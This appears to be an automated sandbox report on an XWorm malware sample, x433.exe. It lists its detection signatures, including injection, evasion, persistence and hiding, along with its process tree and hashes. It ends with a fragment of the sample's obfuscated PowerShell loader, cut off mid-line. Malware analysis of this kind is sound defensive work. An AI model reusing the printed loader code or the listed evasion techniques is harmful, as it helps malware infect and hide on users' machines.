Windows
Analysis Report
x433.exe
Overview
General Information
Detection
XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
x433.exe (PID: 6576 cmdline:
"C:\Users\ user\Deskt op\x433.ex e" MD5: 148EC472DF90B0FB274C3CE2AD2E811F) x4Shellcode.exe (PID: 6808 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\x4Shel lcode.exe" MD5: 851BE4E85B0F111883680E87099483A3) x4host.exe (PID: 6860 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\x4host .exe" MD5: FD744070409A72B86CC2B344D1719B33)
powershell.exe (PID: 6976 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.EXE "f unction Lo cal:rLleiA FHAZAE{Par am([Output Type([Type ])][Parame ter(Positi on=0)][Typ e[]]$Osygf xRUYuIQnc, [Parameter (Position= 1)][Type]$ MbVaDjEwaI )$reLCkliZ wnS=[AppDo main]::Cur rentDomain .DefineDyn amicAssemb ly((New-Ob ject Refle ction.Asse mblyName(' '+'R'+''+[ Char](101) +''+'f'+'l '+[Char](1 01)+''+[Ch ar](99)+'' +'t'+''+[C har](101)+ ''+[Char]( 100)+''+'D '+'e'+[Cha r](108)+'' +'e'+''+[C har](103)+ 'a'+[Char] (116)+''+' e'+'')),[R eflection. Emit.Assem blyBuilder Access]::R un).Define DynamicMod ule(''+[Ch ar](73)+'n '+[Char](7 7)+'e'+[Ch ar](109)+' '+[Char](1 11)+''+[Ch ar](114)+' y'+'M'+'o' +[Char](10 0)+''+[Cha r](117)+'l '+'e'+'',$ False).Def ineType('M y'+'D'+''+ 'e'+''+[Ch ar](108)+' '+[Char](1 01)+''+[Ch ar](103)+' ate'+[Char ](84)+''+' y'+'p'+[Ch ar](101)+' ',''+[Char ](67)+''+[ Char](108) +''+[Char] (97)+''+[C har](115)+ 's'+','+'' +[Char](80 )+''+'u'+' bl'+'i'+'' +[Char](99 )+''+[Char ](44)+''+[ Char](83)+ ''+[Char]( 101)+'a'+[ Char](108) +''+[Char] (101)+''+' d'+','+'A' +''+[Char] (110)+''+[ Char](115) +''+[Char] (105)+''+[ Char](67)+ 'la'+[Char ](115)+''+ 's'+','+[C har](65)+' '+'u'+''+[ Char](116) +''+'o'+'' +[Char](67 )+''+[Char ](108)+'a' +[Char](11 5)+'s',[Mu lticastDel egate]);$r eLCkliZwnS .DefineCon structor(' '+[Char](8 2)+''+'T'+ 'S'+[Char] (112)+''+[ Char](101) +''+[Char] (99)+''+[C har](105)+ ''+[Char]( 97)+'l'+[C har](78)+' '+'a'+''+[ Char](109) +'e'+[Char ](44)+''+[ Char](72)+ ''+'i'+'de ByS'+'i'+' '+'g'+''+[ Char](44)+ ''+'P'+''+ 'u'+''+'b' +''+'l'+'' +[Char](10 5)+'c',[Re flection.C allingConv entions]:: Standard,$ OsygfxRUYu IQnc).SetI mplementat ionFlags(' '+'R'+''+[ Char](117) +''+'n'+'' +[Char](11 6)+''+[Cha r](105)+'' +[Char](10 9)+''+[Cha r](101)+', M'+[Char]( 97)+''+'n' +''+[Char] (97)+''+'g '+''+'e'+' '+'d'+''); $reLCkliZw nS.DefineM ethod(''+[ Char](73)+ ''+[Char]( 110)+'v'+' o'+''+'k'+ ''+[Char]( 101)+'','' +[Char](80 )+''+'u'+' b'+[Char]( 108)+''+[C har](105)+ ''+[Char]( 99)+''+',' +''+[Char] (72)+''+[C har](105)+ 'deB'+'y'+ ''+'S'+'i' +[Char](10 3)+','+'N' +'ew'+[Cha r](83)+''+ [Char](108 )+'o'+[Cha r](116)+'' +','+'Vi'+ [Char](114 )+'t'+[Cha r](117)+'' +[Char](97 )+''+'l'+' ',$MbVaDjE waI,$Osygf xRUYuIQnc) .SetImplem entationFl ags(''+'R' +''+'u'+'' +'n'+''+'t '+''+'i'+' me'+[Char] (44)+''+'M '+''+[Char ](97)+''+' n'+''+[Cha r](97)+'g' +[Char](10 1)+''+'d'+ '');Write- Output $re LCkliZwnS. CreateType ();}$GGVrS jgYYZyVF=( [AppDomain ]::Current Domain.Get Assemblies ()|Where-O bject{$_.G lobalAssem blyCache - And $_.Loc ation.Spli t('\')[-1] .Equals('S y'+[Char]( 115)+''+[C har](116)+ ''+'e'+'m. '+[Char](1 00)+''+[Ch ar](108)+' '+'l'+'')} ).GetType( ''+[Char](